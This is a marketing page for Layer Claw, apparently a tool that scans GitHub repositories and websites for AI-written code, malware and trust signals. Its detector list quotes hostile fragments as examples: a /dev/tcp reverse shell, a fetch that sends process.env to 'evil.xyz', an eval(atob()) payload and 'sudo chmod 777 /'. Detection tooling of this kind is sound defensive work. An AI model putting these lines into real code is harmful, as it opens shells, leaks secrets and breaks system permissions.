SCANTHE CODEWITH AI.

Scan any GitHub repository or website URL for AI-generated code, hidden malware, and trust signals. Real-time analysis, threat detection, and confidence scoring — just paste a link.

Start Scanning→Web Claw — Website Scanner Read Docs Try on Telegram

LATENCY

< 0s

ACCURACY

REPOS SCANNED

LANGUAGES

FEATURES

Built for security.

On-Chain Security Intelligence

AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.

Security Audit

OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.

Developer Profiling

Score repo owners 0-100 based on followers, stars, activity, and contribution history.

Telegram Bot

Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.

On-Chain Security Intelligence

AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.

Security Audit

OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.

Developer Profiling

Score repo owners 0-100 based on followers, stars, activity, and contribution history.

Telegram Bot

Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.

On-Chain Security Intelligence

AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.

Security Audit

OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.

Developer Profiling

Score repo owners 0-100 based on followers, stars, activity, and contribution history.

Telegram Bot

Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.

On-Chain Security Intelligence

AI-powered threat detection with heuristic + AI-agent analysis. Scores every repo 0-100.

Security Audit

OWASP Top 10 coverage. Flags hardcoded secrets, XSS, SQL injection, and backdoors.

Developer Profiling

Score repo owners 0-100 based on followers, stars, activity, and contribution history.

Telegram Bot

Scan repos directly from Telegram. /scan any GitHub link — results with inline buttons.

Timeline Analysis

Detect backdated commits, suspicious gaps, and burst activity in repo history.

Code Effort Scoring

Measures real development effort — file count, complexity, avg size, largest file analysis.

Heuristic Analysis

Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.

Instant Cached Results

5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.

Timeline Analysis

Detect backdated commits, suspicious gaps, and burst activity in repo history.

Code Effort Scoring

Measures real development effort — file count, complexity, avg size, largest file analysis.

Heuristic Analysis

Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.

Instant Cached Results

5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.

Timeline Analysis

Detect backdated commits, suspicious gaps, and burst activity in repo history.

Code Effort Scoring

Measures real development effort — file count, complexity, avg size, largest file analysis.

Heuristic Analysis

Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.

Instant Cached Results

5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.

Timeline Analysis

Detect backdated commits, suspicious gaps, and burst activity in repo history.

Code Effort Scoring

Measures real development effort — file count, complexity, avg size, largest file analysis.

Heuristic Analysis

Commit patterns, bus factor, burst scoring, contributor analysis — all without AI costs.

Instant Cached Results

5-day scan cache shared across Web, Telegram Bot, and Mini App. Repeat scans are instant.

HOW IT WORKS

From paste to protected.

Six steps to a full security report. Click any step to see live output.

Start the Engine

Launch the layer.claw scan engine with a single command. It initializes the AI analysis pipeline, connects to the detection models, and prepares for scanning.

$ npm run layer.claw

▸Type npm run layer.claw in the terminal
▸Engine boots in under 2 seconds
▸No configuration or API keys needed to start
▸Works on any public GitHub repository

layer.claw — start

layer.claw$ npm run layer.claw

> layer.claw@1.0.0 layer.claw

> Starting scan engine...

[info] Loading neural analysis engine

[info] Connecting to detection models

[info] Calibrating pattern matching

[ok] Engine initialized

[ok] AI models loaded

[ok] Ready for scanning

Engine ready. Paste a GitHub repository URL.

█

THREAT DETECTION

What we detect.

12 specialized detectors scan every file. Real findings from real scans.

AI-generated code

HIGH

Pattern match against ChatGPT, Copilot, and other AI signatures

matches src/utils/helpers.ts — style entropy 0.12, naming score 94%

Analyzes writing patterns, variable naming, comment style, and structural consistency to identify AI-authored files.

Trojans & backdoors

CRITICAL

Hidden reverse shell in postinstall script

matches scripts/setup.sh — exec /bin/bash -i >& /dev/tcp/...

Detects hidden remote access payloads, reverse shells, and trojan code disguised as legitimate utilities.

Crypto miners

CRITICAL

Stealth XMRig miner embedded in worker thread

matches src/workers/compute.js — crypto.randomBytes + stratum://

Identifies mining scripts that hijack CPU/GPU resources, including pool connections and hash rate throttling.

Data exfiltration

CRITICAL

Environment variables sent to external endpoint

matches src/config/init.ts — fetch('https://evil.xyz', {body: process.env})

Catches code that silently leaks secrets, cookies, private keys, or user data to unknown external servers.

Injection attacks

HIGH

Unescaped user input in SQL query builder

matches src/db/query.ts — `SELECT * FROM users WHERE id=${req.params.id}`

Scans for SQL injection, XSS, command injection, LDAP injection, and other input validation failures.

Hardcoded secrets

HIGH

AWS access key exposed in source code

matches src/config/aws.ts — AKIA... (20 char key pattern)

Detects API keys, passwords, tokens, private keys, and credentials committed directly to source code.

Obfuscated code

HIGH

Base64-encoded eval() payload in dependency

matches node_modules/help-util/index.js — eval(atob('...'))

Flags intentionally unreadable code: base64 payloads, hex-encoded strings, packed/minified malware.

Weak cryptography

MEDIUM

MD5 used for password hashing

matches src/auth/hash.ts — crypto.createHash('md5')

Identifies broken encryption, deprecated algorithms, insecure random generation, and weak hashing.

Unauthorized network

HIGH

Outbound request to unknown domain on startup

matches src/init.ts — fetch('https://unknown-domain.xyz/ping')

Detects unexpected outbound connections, hidden webhooks, DNS exfiltration, and suspicious API calls.

Privilege escalation

CRITICAL

Subprocess spawns root shell via sudo

matches scripts/install.sh — sudo chmod 777 / && exec bash

Catches code that attempts to gain elevated permissions, exploit SUID binaries, or bypass access controls.

Vulnerable deps

MEDIUM

Known CVE in lodash@4.17.20

matches package.json — CVE-2021-23337 (prototype pollution)

Checks package manifests against CVE databases, flags typosquatted modules and supply chain risks.

File system attacks

MEDIUM

Path traversal in file upload handler

matches src/api/upload.ts — path.join(dir, req.body.filename)

Detects unauthorized file reads/writes, directory traversal exploits, symlink attacks, and temp file abuse.

...and dozens more patterns across supply chain attacks, deserialization, prototype pollution, and other emerging threats.

WEBSITE SCANNER

Meet Web Claw.

Try it now →

Scan any website for trust signals — not just GitHub repos. Built for crypto users vetting projects before connecting their wallet.

Full website analysis

in the dashboard, type

npm run web.claw

Domain RDAP: registered date, owner, registrar, nameservers
Host geolocation: country, city, ISP, proxy/datacenter flags
Multi-page crawl: reads sitemap + fetches docs, team, about pages
AI trust analysis: threat level, category, summary, safety checks
Works on React/Next.js SPAs — JS fully rendered via Jina Reader

web.claw — scan result

web.claw — nookplot.com

─────────────────────────────

Risk: LOW · Category: AI

Domain: 39 days old · Jan 20 2026

Server: Toronto, Canada (Cloudflare)

─────────────────────────────

Summary

Decentralized coordination protocol

for AI agents on Base. Provides

identity, reputation, and economic

primitives for agent collaboration.

─────────────────────────────

Trust Signals (7)

Open source · Founder known · HTTPS

Weak Points (9)

No audit · No tokenomics docs

No wallet required

anyone can scan any website

Instant repeat scans

previously scanned sites load fast

Telegram /scanweb

or paste any non-GitHub URL

NETWORK

The map.

Explore full map →

Every project scanned by Github Claw and Web Claw — visualized as an interactive network graph. Nodes colored by threat level, connected by category.

Network Graph

Click any node to see its security summary, threat level, category, and full scan results. Filter by category to explore specific sectors.

Green = NONE / LOW threat
Yellow = MEDIUM threat
Red = HIGH / CRITICAL threat

Repos

Websites

API PRICING

Scale with power.

Integrate Layer Claw scanning into your workflow. Choose your plan and pay with crypto.

Premium

$17/month

For individual developers who scan regularly.

500 API calls/month
Public repo scanning
AI detection + virus scan
JSON response format
Email support

RECOMMENDED

PRO

$44/month

For teams shipping production code daily.

5,000 API calls/month
Public + private repos
AI detection + virus + audit
Telegram group bot
Webhook integrations
Priority support
Team dashboard access

Expert

$199/month

For enterprises with custom security needs.

Unlimited API calls
Public + private repos
Full scan suite + custom rules
Telegram group bot
CI/CD pipeline integration
Dedicated support channel
SLA guarantee
Custom detection models

DEVELOPERS

Read the docs.

API Reference

Explore the Layer Claw API documentation. Endpoints, authentication, response schemas, and integration guides — everything you need to build on top of Layer Claw.

View Documentation→

// Example API request

POST /api/v1/scan

{

"url": "https://github.com/user/repo",

"depth": "full"

}

// 200 OK

{

"aiScore": 34,

"threatLevel": "LOW",

"verdict": "human"

}

TELEGRAM BOT

Scan from Telegram.

Add the Layer Claw bot to your chat. Paste a GitHub link, get a full security report — without leaving Telegram.

@layerclaw_bot

Direct message scanning

Message the bot directly with any GitHub repository URL. It opens a mini terminal inside Telegram — same scanning engine, same results, zero setup.

Paste a GitHub link, get instant results
9-section reports with inline buttons
Full scan report with AI detection + threats
Free for all users — 1 scan / 5 min

Open Bot →

Group scanning

PRO plan feature

Add Layer Claw to your team's Telegram group. Anyone can paste a repo link and the bot auto-scans it — keeping your entire team protected in real time.